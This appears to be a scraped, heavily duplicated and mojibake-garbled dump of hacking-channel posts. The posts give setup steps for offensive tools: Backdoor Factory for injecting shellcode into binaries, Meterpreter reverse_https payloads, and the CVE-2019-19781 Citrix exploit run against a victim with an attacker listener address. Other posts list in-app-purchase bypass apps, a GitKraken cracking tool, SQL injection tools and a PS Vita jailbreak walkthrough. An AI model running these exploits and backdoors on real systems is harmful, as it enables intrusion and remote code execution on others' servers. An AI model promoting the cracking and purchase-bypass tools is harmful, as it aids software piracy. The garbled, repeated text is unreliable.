β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Best android apps 2019-2020 to bypass purchase :
T.me/UndercOdeTesting
π¦π »π ΄π π πππ °οΈππ:
1) LUCKY PATCHER
Lucky Patcher is the most commonly used application for bypassing the in-app purchase restrictions in Android apps.
> https://www.luckypatchers.com/download/
2) FREEDOM APK
Freedom APK is an Android app which will help you unlock the premium features of popular games free of cost.
> https://freedomapkdld.com/
3) LEO PLAYCARD
Another app you can use to hack in-app purchase on Android is Leo Playcard. The app hacks Android games in a manner similar to Lucky Patcher above.
> http://leoplaycard.info/
4) XMODGAMES
Xmodgames is another app that allows you to access in-app purchases in games for free. This app unlocks purchases in games like βClash of Clansβ, β8 ball poolβ, βClash Royale π
> https://xmodgames.download/
5) CREE HACK
Cree Hack is another good application to get the free in-app purchase on Android for any game and update to the maximum level.
> https://creehacks.com/
Written by UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Best android apps 2019-2020 to bypass purchase :
T.me/UndercOdeTesting
π¦π »π ΄π π πππ °οΈππ:
1) LUCKY PATCHER
Lucky Patcher is the most commonly used application for bypassing the in-app purchase restrictions in Android apps.
> https://www.luckypatchers.com/download/
2) FREEDOM APK
Freedom APK is an Android app which will help you unlock the premium features of popular games free of cost.
> https://freedomapkdld.com/
3) LEO PLAYCARD
Another app you can use to hack in-app purchase on Android is Leo Playcard. The app hacks Android games in a manner similar to Lucky Patcher above.
> http://leoplaycard.info/
4) XMODGAMES
Xmodgames is another app that allows you to access in-app purchases in games for free. This app unlocks purchases in games like βClash of Clansβ, β8 ball poolβ, βClash Royale π
> https://xmodgames.download/
5) CREE HACK
Cree Hack is another good application to get the free in-app purchase on Android for any game and update to the maximum level.
> https://creehacks.com/
Written by UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦WANNA TO HACK CARS LIKE FATE&FURIOUS, Remontly, unlocking ...
T.me/UndercOdeTesting
1) OpenGarages - Provides public access, documentation and tools necessary to understand today's modern vehicle systems.
> http://opengarages.org/index.php/Main_Page
2) DEFCON Car Hacking Village - Car Hacking exercises from DEFCON 24.
> http://www.carhackingvillage.com/
3) canbushack: Hack Your Car - course on Vehicle Hacking methodology.
> http://www.canbushack.com/blog/index.php
4) OWASP Internet of Things Project - OWASP's project to secure IoT, from cars to medical devices and beyond.
> https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=Community
5) I Am The Cavalry - Global grassroots (eg. volunteer) initiative focused on the intersection of security and human life/public safety issues, such as cars. Participation from security researchers, OEMs, Tier 1s, and many others. Published Automotive 5-Star Cyber Safety Framework.
> https://www.iamthecavalry.org/
6) Carloop Community - Community of people interested in car hacking and connecting vehicles to the cloud.
> https://community.carloop.io/
7) Python Security - A website for brows in and buying python-integrated cars having certain vehicular security features.
> http://www.pythoncarsecurity.com/
Written by UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦WANNA TO HACK CARS LIKE FATE&FURIOUS, Remontly, unlocking ...
T.me/UndercOdeTesting
1) OpenGarages - Provides public access, documentation and tools necessary to understand today's modern vehicle systems.
> http://opengarages.org/index.php/Main_Page
2) DEFCON Car Hacking Village - Car Hacking exercises from DEFCON 24.
> http://www.carhackingvillage.com/
3) canbushack: Hack Your Car - course on Vehicle Hacking methodology.
> http://www.canbushack.com/blog/index.php
4) OWASP Internet of Things Project - OWASP's project to secure IoT, from cars to medical devices and beyond.
> https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=Community
5) I Am The Cavalry - Global grassroots (eg. volunteer) initiative focused on the intersection of security and human life/public safety issues, such as cars. Participation from security researchers, OEMs, Tier 1s, and many others. Published Automotive 5-Star Cyber Safety Framework.
> https://www.iamthecavalry.org/
6) Carloop Community - Community of people interested in car hacking and connecting vehicles to the cloud.
> https://community.carloop.io/
7) Python Security - A website for brows in and buying python-integrated cars having certain vehicular security features.
> http://www.pythoncarsecurity.com/
Written by UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
2020 updated web server scanner
Fb.com/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/sullo/nikto.git
2) cd nikto
3) docker build -t sullo/nikto .
# Call it without arguments to display the full help
4) docker run --rm sullo/nikto
# Basic usage
5)docker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:
6) docker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json
π¦Tested by UndercOde On:
> kali
> ubanto
Written by UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
2020 updated web server scanner
Fb.com/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/sullo/nikto.git
2) cd nikto
3) docker build -t sullo/nikto .
# Call it without arguments to display the full help
4) docker run --rm sullo/nikto
# Basic usage
5)docker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:
6) docker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json
π¦Tested by UndercOde On:
> kali
> ubanto
Written by UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
UndercOde Testing Company
UndercOde Testing Company. 138 likes Β· 13 talking about this. Programming, Hacking,Security, Web & Applications Developpements, Fix Errors , Hosts, Server Security, Hacking Pentest, Phone softwares &...
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Social engeneer tool : the backdoor factory For security professionals and researchers only.
The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) sudo pip install capstone
2) git clone https://github.com/secretsquirrel/the-backdoor-factory
3) cd the-backdoor-factory
4) docker pull secretsquirrel/the-backdoor-factory
5) docker run -it secretsquirrel/the-backdoor-factory bash
6) ./backdoor.py
π¦For Macos run as bash :
chmod 777 install.sh
./install.sh
Written by UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Social engeneer tool : the backdoor factory For security professionals and researchers only.
The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) sudo pip install capstone
2) git clone https://github.com/secretsquirrel/the-backdoor-factory
3) cd the-backdoor-factory
4) docker pull secretsquirrel/the-backdoor-factory
5) docker run -it secretsquirrel/the-backdoor-factory bash
6) ./backdoor.py
π¦For Macos run as bash :
chmod 777 install.sh
./install.sh
Written by UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is the difference between IPv4 and IPv6?
One of the main differences between IPv4 and IPv6 is their address space:
twitter.com/UNdercodetc
1) IPv4 addresses are 32 bits in size.
> Whereas the IPv6 address fields are 128 bits.
2) Due to their difference in address space, the appearance of IP addresses in IPv4 and IPv6 also looks different.
> In IPv4, IP addresses are displayed as four decimal numbers in 1 byte, separated by periods (for example: 192.168.1.1), and in IPv6 IP addresses, hexadecimal numbers are displayed, separated by colons (for example: fe80 :: d4a8: 6435: d2d8: d9f3b11) .
3) Clients using IPv4 addresses use a DHCP server to determine the address each time they enter the network.
>This process of assigning addresses is called automatic network state tuning.
4) IPv6 supports the revised DHCPv6 protocol, which supports automatic state configuration and supports automatic stateless configuration of hosts.
5) Automatic configuration without saving does not require the DHCP server to receive addresses.
6) Automatic configuration without saving uses a router request to create a unique address.
> This creates a plug-and-play environment that simplifies address management and administration.
7) IPv6 also allows automatic configuration and reconfiguration of addresses.
8) This feature allows administrators to renumber network addresses without access to all clients.
This is the main difference between IPv4 and IPv6.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is the difference between IPv4 and IPv6?
One of the main differences between IPv4 and IPv6 is their address space:
twitter.com/UNdercodetc
1) IPv4 addresses are 32 bits in size.
> Whereas the IPv6 address fields are 128 bits.
2) Due to their difference in address space, the appearance of IP addresses in IPv4 and IPv6 also looks different.
> In IPv4, IP addresses are displayed as four decimal numbers in 1 byte, separated by periods (for example: 192.168.1.1), and in IPv6 IP addresses, hexadecimal numbers are displayed, separated by colons (for example: fe80 :: d4a8: 6435: d2d8: d9f3b11) .
3) Clients using IPv4 addresses use a DHCP server to determine the address each time they enter the network.
>This process of assigning addresses is called automatic network state tuning.
4) IPv6 supports the revised DHCPv6 protocol, which supports automatic state configuration and supports automatic stateless configuration of hosts.
5) Automatic configuration without saving does not require the DHCP server to receive addresses.
6) Automatic configuration without saving uses a router request to create a unique address.
> This creates a plug-and-play environment that simplifies address management and administration.
7) IPv6 also allows automatic configuration and reconfiguration of addresses.
8) This feature allows administrators to renumber network addresses without access to all clients.
This is the main difference between IPv4 and IPv6.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE TESTING COMPANY (@UnderCodeTC) | Twitter
The latest Tweets from UNDERCODE TESTING COMPANY (@UnderCodeTC). πΈππ§πππππ & πΈππ¨ππͺπ€ ππ‘πππ₯ππ. Lebanon-North
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Top Exploite tool Meterpreter Paranoid Mode - SSL/TLS connections for linux :
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) Download framework from github
> git clone https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL.git
2) Set files execution permitions
> cd Meterpreter_Paranoid_Mode-SSL
3) sudo chmod +x *.sh
4) Config tool settings
> nano settings
5) Run main tool
>sudo ./Meterpreter_Paranoid_Mode.sh
π¦Payloads available:
Staged (payload.bat|ps1|txt|exe):
windows/meterpreter/reverse_winhttps
windows/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https
Stageless (binary.exe):
windows/meterpreter_reverse_https
windows/x64/meterpreter_reverse_https
Written by UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Top Exploite tool Meterpreter Paranoid Mode - SSL/TLS connections for linux :
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) Download framework from github
> git clone https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL.git
2) Set files execution permitions
> cd Meterpreter_Paranoid_Mode-SSL
3) sudo chmod +x *.sh
4) Config tool settings
> nano settings
5) Run main tool
>sudo ./Meterpreter_Paranoid_Mode.sh
π¦Payloads available:
Staged (payload.bat|ps1|txt|exe):
windows/meterpreter/reverse_winhttps
windows/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https
Stageless (binary.exe):
windows/meterpreter_reverse_https
windows/x64/meterpreter_reverse_https
Written by UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller and Citrix Gateway detailed
fb.com/UndercOdeTestingCompany
π¦π »π ΄π π πππ °οΈππ:
> A vulnerability has been identified in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.
> The vulnerability has been assigned the following CVE number:
> CVE-2019-19781 : Vulnerability in Citrix Application Delivery Controller and Citrix Gateway leading to arbitrary code execution
> The vulnerability affects all supported product versions and all supported platforms:
1) Citrix ADC and Citrix Gateway version 13.0 all supported builds
2) Citrix ADC and NetScaler Gateway version 12.1 all supported builds
3) Citrix ADC and NetScaler Gateway version 12.0 all supported builds
4) Citrix ADC and NetScaler Gateway version 11.1 all supported builds
5) Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
@MΜ΅Ν Μ ΜrΜΆΜ.Μ΅Μ Μ·Ν BΜ΄ΝOΜ·ΜTΜΆΜNΜ΄ΜEΜΆΝTΜΆΜ (tm
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller and Citrix Gateway detailed
fb.com/UndercOdeTestingCompany
π¦π »π ΄π π πππ °οΈππ:
> A vulnerability has been identified in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.
> The vulnerability has been assigned the following CVE number:
> CVE-2019-19781 : Vulnerability in Citrix Application Delivery Controller and Citrix Gateway leading to arbitrary code execution
> The vulnerability affects all supported product versions and all supported platforms:
1) Citrix ADC and Citrix Gateway version 13.0 all supported builds
2) Citrix ADC and NetScaler Gateway version 12.1 all supported builds
3) Citrix ADC and NetScaler Gateway version 12.0 all supported builds
4) Citrix ADC and NetScaler Gateway version 11.1 all supported builds
5) Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
@MΜ΅Ν Μ ΜrΜΆΜ.Μ΅Μ Μ·Ν BΜ΄ΝOΜ·ΜTΜΆΜNΜ΄ΜEΜΆΝTΜΆΜ (tm
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦cve-2019-19781 Bug
>This is a tool published for the Citrix ADC (NetScaler) vulnerability. We are only disclosing this due to others publishing the exploit code first.
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
This tool used for exploite servers
1) git clone https://github.com/trustedsec/cve-2019-19781
2) cd cve-2019-19781
3) pip3 install -r requirements.txt
4) python citrixmash.py <attackerip_listener> <attacker_port>
π¦How it works ?
> This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for remote code execution.
> Be sure to cleanup these two file locations: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/
>Note that DNS hostnames and IP addresses are supported in victimaddress and attackerip_listener fields.
Written by UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦cve-2019-19781 Bug
>This is a tool published for the Citrix ADC (NetScaler) vulnerability. We are only disclosing this due to others publishing the exploit code first.
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
This tool used for exploite servers
1) git clone https://github.com/trustedsec/cve-2019-19781
2) cd cve-2019-19781
3) pip3 install -r requirements.txt
4) python citrixmash.py <attackerip_listener> <attacker_port>
π¦How it works ?
> This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for remote code execution.
> Be sure to cleanup these two file locations: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/
>Note that DNS hostnames and IP addresses are supported in victimaddress and attackerip_listener fields.
Written by UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Automated All-in-One OS command injection and exploitation tool
2020 updated :
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/commixproject/commix.git commix
2) cd commix
3) python commix.py -h
π¦What is The Use ?
>Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool ,
>that can be used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks.
> By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Automated All-in-One OS command injection and exploitation tool
2020 updated :
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/commixproject/commix.git commix
2) cd commix
3) python commix.py -h
π¦What is The Use ?
>Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool ,
>that can be used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks.
> By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦HexInject is a very versatile packet injector and sniffer, that provide a command-line framework for raw network access.
>HexInject is a very versatile packet injector and sniffer,
that provide a command-line framework for raw network access.
fb.com/UndercOdeTestingCompany
It's designed to work together with others command-line utilities,
and for this reason it facilitates the creation of powerful shell scripts
capable of reading, intercepting and modifying network traffic in a transparent manner
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/ParrotSec/hexinject
2) cd hexinject
3) Type make to compile (install)
π¦Features :
1) hexinject:
The main sniffer and injector.
2) prettypacket:
Disassemble raw packets (received on its standard input) and print their field.
Can also print example packets (useful if you want to know the structure of an header).
3) hex2raw:
Convert hexstring (the textual format used by hexinject) to raw data,
and vice-versa.
4) packets.tcl:
Experimental packet forger, written in TCL.
It uses a simple packet representation format based on APD
π¦Tested On:
>Parrot
@MΜ΅Ν Μ ΜrΜΆΜ.Μ΅Μ Μ·Ν BΜ΄ΝOΜ·ΜTΜΆΜNΜ΄ΜEΜΆΝTΜΆΜ (tm
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦HexInject is a very versatile packet injector and sniffer, that provide a command-line framework for raw network access.
>HexInject is a very versatile packet injector and sniffer,
that provide a command-line framework for raw network access.
fb.com/UndercOdeTestingCompany
It's designed to work together with others command-line utilities,
and for this reason it facilitates the creation of powerful shell scripts
capable of reading, intercepting and modifying network traffic in a transparent manner
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/ParrotSec/hexinject
2) cd hexinject
3) Type make to compile (install)
π¦Features :
1) hexinject:
The main sniffer and injector.
2) prettypacket:
Disassemble raw packets (received on its standard input) and print their field.
Can also print example packets (useful if you want to know the structure of an header).
3) hex2raw:
Convert hexstring (the textual format used by hexinject) to raw data,
and vice-versa.
4) packets.tcl:
Experimental packet forger, written in TCL.
It uses a simple packet representation format based on APD
π¦Tested On:
>Parrot
@MΜ΅Ν Μ ΜrΜΆΜ.Μ΅Μ Μ·Ν BΜ΄ΝOΜ·ΜTΜΆΜNΜ΄ΜEΜΆΝTΜΆΜ (tm
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Top 2019-2020 injection tools agaible on gitlab & github
twitter.com/UndercOdeTc
π¦π »π ΄π π πππ °οΈππ:
1) SQLMap - Automatic SQL Injection And Database Takeover Tool
2) jSQL Injection - Java Tool For Automatic SQL Database Injection
3) BBQSQL - A Blind SQL Injection Exploitation Tool
4) NoSQLMap - Automated NoSQL Database Pwnage
5) Whitewidow - SQL Vulnerability Scanner
6) DSSS - Damn Small SQLi Scanner
7) explo - Human And Machine Readable Web Vulnerability Testing Format
8) Blind-Sql-Bitshifting - Blind SQL Injection via Bitshifting
9) Leviathan - Wide Range Mass Audit Toolkit
10) Blisqy - Exploit Time-based blind-SQL injection in HTTP-Headers (MySQL/MariaDB)
@MΜ΅Ν Μ ΜrΜΆΜ.Μ΅Μ Μ·Ν BΜ΄ΝOΜ·ΜTΜΆΜNΜ΄ΜEΜΆΝTΜΆΜ (tm
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Top 2019-2020 injection tools agaible on gitlab & github
twitter.com/UndercOdeTc
π¦π »π ΄π π πππ °οΈππ:
1) SQLMap - Automatic SQL Injection And Database Takeover Tool
2) jSQL Injection - Java Tool For Automatic SQL Database Injection
3) BBQSQL - A Blind SQL Injection Exploitation Tool
4) NoSQLMap - Automated NoSQL Database Pwnage
5) Whitewidow - SQL Vulnerability Scanner
6) DSSS - Damn Small SQLi Scanner
7) explo - Human And Machine Readable Web Vulnerability Testing Format
8) Blind-Sql-Bitshifting - Blind SQL Injection via Bitshifting
9) Leviathan - Wide Range Mass Audit Toolkit
10) Blisqy - Exploit Time-based blind-SQL injection in HTTP-Headers (MySQL/MariaDB)
@MΜ΅Ν Μ ΜrΜΆΜ.Μ΅Μ Μ·Ν BΜ΄ΝOΜ·ΜTΜΆΜNΜ΄ΜEΜΆΝTΜΆΜ (tm
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Crack GitKraken 2019 tool
T.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/5cr1pt/GitCracken
2) cd GitCracken
3) then run :
> yarn install
4) yarn build
5) node dist/bin/gitcracken.js --help for more usage information
6)gitcracken patcher [options] [actions...]
π¦Examples :
> Auto patch installed GitKraken (maybe require sudo privileges on GNU/Linux)
1) gitcracken patcher
Use custom path to app.asar
2)?gitcracken patcher --asar ~/Downloads/gitkraken/resources/app.asar
Use custom actions (backup, unpack and patch)
3) gitcracken patcher backup unpack patch
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Crack GitKraken 2019 tool
T.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/5cr1pt/GitCracken
2) cd GitCracken
3) then run :
> yarn install
4) yarn build
5) node dist/bin/gitcracken.js --help for more usage information
6)gitcracken patcher [options] [actions...]
π¦Examples :
> Auto patch installed GitKraken (maybe require sudo privileges on GNU/Linux)
1) gitcracken patcher
Use custom path to app.asar
2)?gitcracken patcher --asar ~/Downloads/gitkraken/resources/app.asar
Use custom actions (backup, unpack and patch)
3) gitcracken patcher backup unpack patch
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How install & Run any Yarn File :
T.me/UndercOdeTesting
π¦π »π ΄π π πππ °οΈππ:
1) open terminal & type
> curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | sudo apt-key add
4) Add the Yarn APT repository to your system's software repository list by typing:
> echo "deb https://dl.yarnpkg.com/debian/ stable main" | sudo tee /etc/apt/sources.list.d/yarn.list
5) Once the repository is added to the system, update the package list, and install Yarn, with:
> sudo apt update
> sudo apt install yarn
6) If you already don't have Node.js installed on your system, the command above will install it.
7)!Those who are using nvm can skip the Node.js installation with:
> sudo apt install --no-install-recommends yarn
8) To verify that Yarn installed successfully, run the following commands which will print the Yarn version number:
yarn --version
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How install & Run any Yarn File :
T.me/UndercOdeTesting
π¦π »π ΄π π πππ °οΈππ:
1) open terminal & type
> curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | sudo apt-key add
4) Add the Yarn APT repository to your system's software repository list by typing:
> echo "deb https://dl.yarnpkg.com/debian/ stable main" | sudo tee /etc/apt/sources.list.d/yarn.list
5) Once the repository is added to the system, update the package list, and install Yarn, with:
> sudo apt update
> sudo apt install yarn
6) If you already don't have Node.js installed on your system, the command above will install it.
7)!Those who are using nvm can skip the Node.js installation with:
> sudo apt install --no-install-recommends yarn
8) To verify that Yarn installed successfully, run the following commands which will print the Yarn version number:
yarn --version
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Trity Exploite Tool top 2019:Emulator Escape
>Trinity is the third public jailbreak for the PS Vitaβ’, which supports the latest firmwares 3.69 and 3.70. The exploit chain consists of three stages: the MIPS Kernel Exploit, the PSP Emulator Escape and the ARM Kernel Exploit.
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) Download and install qcma and psvimgtools.
> https://codestation.github.io/qcma/
>https://github.com/yifanlu/psvimgtools/releases
2) Start qcma and within the qcma settings set the option Use this version for updates to FW 0.00 (Always up-to-date) to spoof the System Software check.
3) Launch Content Manager on your PS Vita and connect it to your computer, where you then need to select PS Vita System -> PC, and after that you select Applications. Finally select PSPβ’/Other and click on the game that you want to turn into the Trinity exploit. If you see an error message about System Software, you should simply reboot your device to solve it (if this doesn't solve, then put your device into airplane mode and reboot). If this does still not work, then alternatively set DNS to 212.47.229.76 to block updates.
4) Transfer the game over to your computer by clicking on Copy on your PS Vita. After copying, you go to the folder /Documents/PS Vita/PGAME/xxxxxxxxxxxxxxxx/YYYYZZZZZ on your computer, where xxxxxxxxxxxxxxxx is some string corresponding to your account ID and YYYYZZZZZ is the title id of the game that you've just copied over. You can look at the image at YYYYZZZZZ/sce_sys/icon0.png to verify that it is indeed your chosen game. Furthermore, the YYYYZZZZZ folder should contain these folders: game, license and sce_sys.
5) Before you attempt to modify the backup, you should make a copy of it. Just copy YYYYZZZZZ somewhere else, such that if you fail to follow the instructions, you can copy it back and retry.
6) Insert the xxxxxxxxxxxxxxxx string here. If the AID is valid, it will yield a key that you can now use to decrypt/re-encrypt your game.
7) Decrypt the game backup by executing the following command in your command line/terminal (make sure you're in the right working directory. On Windows you can open the terminal in the current working directory by typing in cmd in the path bar of the file explorer. Also, if you haven't installed psvimgtools yet, then just place them in the YYYYZZZZZ folder):
> psvimg-extract -K YOUR_KEY game/game.psvimg game_dec
If done correctly, you should see an output like this:
> creating file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/EBOOT.PBP (x bytes)...
>creating file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/__sce_ebootpbp (x bytes)...
all done.
8) Download Trinity and copy the PBOOT.PBP file to game_dec/ux0_pspemu_temp_game_PSP_GAME_YYYYZZZZZ/PBOOT.PBP (the files EBOOT.PBP, __sce_ebootpbp and VITA_PATH.txt should exist in this folder). If PBOOT.PBP does already exist there, just overwrite it.
> https://github.com/TheOfficialFloW/Trinity/releases/download/v1.0/PBOOT.PBP
9) Now re-encrypt the backup similar to above by typing this in your command line/terminal:
> psvimg-create -n game -K YOUR_KEY game_dec game
If done correctly, you should see an output like this:
>adding files for ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ
packing file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/EBOOT.PBP (x bytes)...
packing file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/PBOOT.PBP (x bytes)...
packing file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/__sce_ebootpbp (x bytes)...
created game/game.psvimg (size: x, content size: x)
created game/game.psvmd
10) Remove the game_dec folder (and PSVimg tools if copied here) and
11) select Refresh database in qcma settings.
12) Now you need to copy back the modified backup to your PS Vita: Launch Content Manager on your PS Vita and connect it to your computer (if it's already open, just go back to the first menu), where you then need to select PC -> PS Vita System, and after that you select Applications. Finally select PSPβ’/Other and click on the modified game.
π¦Trity Exploite Tool top 2019:Emulator Escape
>Trinity is the third public jailbreak for the PS Vitaβ’, which supports the latest firmwares 3.69 and 3.70. The exploit chain consists of three stages: the MIPS Kernel Exploit, the PSP Emulator Escape and the ARM Kernel Exploit.
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) Download and install qcma and psvimgtools.
> https://codestation.github.io/qcma/
>https://github.com/yifanlu/psvimgtools/releases
2) Start qcma and within the qcma settings set the option Use this version for updates to FW 0.00 (Always up-to-date) to spoof the System Software check.
3) Launch Content Manager on your PS Vita and connect it to your computer, where you then need to select PS Vita System -> PC, and after that you select Applications. Finally select PSPβ’/Other and click on the game that you want to turn into the Trinity exploit. If you see an error message about System Software, you should simply reboot your device to solve it (if this doesn't solve, then put your device into airplane mode and reboot). If this does still not work, then alternatively set DNS to 212.47.229.76 to block updates.
4) Transfer the game over to your computer by clicking on Copy on your PS Vita. After copying, you go to the folder /Documents/PS Vita/PGAME/xxxxxxxxxxxxxxxx/YYYYZZZZZ on your computer, where xxxxxxxxxxxxxxxx is some string corresponding to your account ID and YYYYZZZZZ is the title id of the game that you've just copied over. You can look at the image at YYYYZZZZZ/sce_sys/icon0.png to verify that it is indeed your chosen game. Furthermore, the YYYYZZZZZ folder should contain these folders: game, license and sce_sys.
5) Before you attempt to modify the backup, you should make a copy of it. Just copy YYYYZZZZZ somewhere else, such that if you fail to follow the instructions, you can copy it back and retry.
6) Insert the xxxxxxxxxxxxxxxx string here. If the AID is valid, it will yield a key that you can now use to decrypt/re-encrypt your game.
7) Decrypt the game backup by executing the following command in your command line/terminal (make sure you're in the right working directory. On Windows you can open the terminal in the current working directory by typing in cmd in the path bar of the file explorer. Also, if you haven't installed psvimgtools yet, then just place them in the YYYYZZZZZ folder):
> psvimg-extract -K YOUR_KEY game/game.psvimg game_dec
If done correctly, you should see an output like this:
> creating file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/EBOOT.PBP (x bytes)...
>creating file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/__sce_ebootpbp (x bytes)...
all done.
8) Download Trinity and copy the PBOOT.PBP file to game_dec/ux0_pspemu_temp_game_PSP_GAME_YYYYZZZZZ/PBOOT.PBP (the files EBOOT.PBP, __sce_ebootpbp and VITA_PATH.txt should exist in this folder). If PBOOT.PBP does already exist there, just overwrite it.
> https://github.com/TheOfficialFloW/Trinity/releases/download/v1.0/PBOOT.PBP
9) Now re-encrypt the backup similar to above by typing this in your command line/terminal:
> psvimg-create -n game -K YOUR_KEY game_dec game
If done correctly, you should see an output like this:
>adding files for ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ
packing file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/EBOOT.PBP (x bytes)...
packing file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/PBOOT.PBP (x bytes)...
packing file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/__sce_ebootpbp (x bytes)...
created game/game.psvimg (size: x, content size: x)
created game/game.psvmd
10) Remove the game_dec folder (and PSVimg tools if copied here) and
11) select Refresh database in qcma settings.
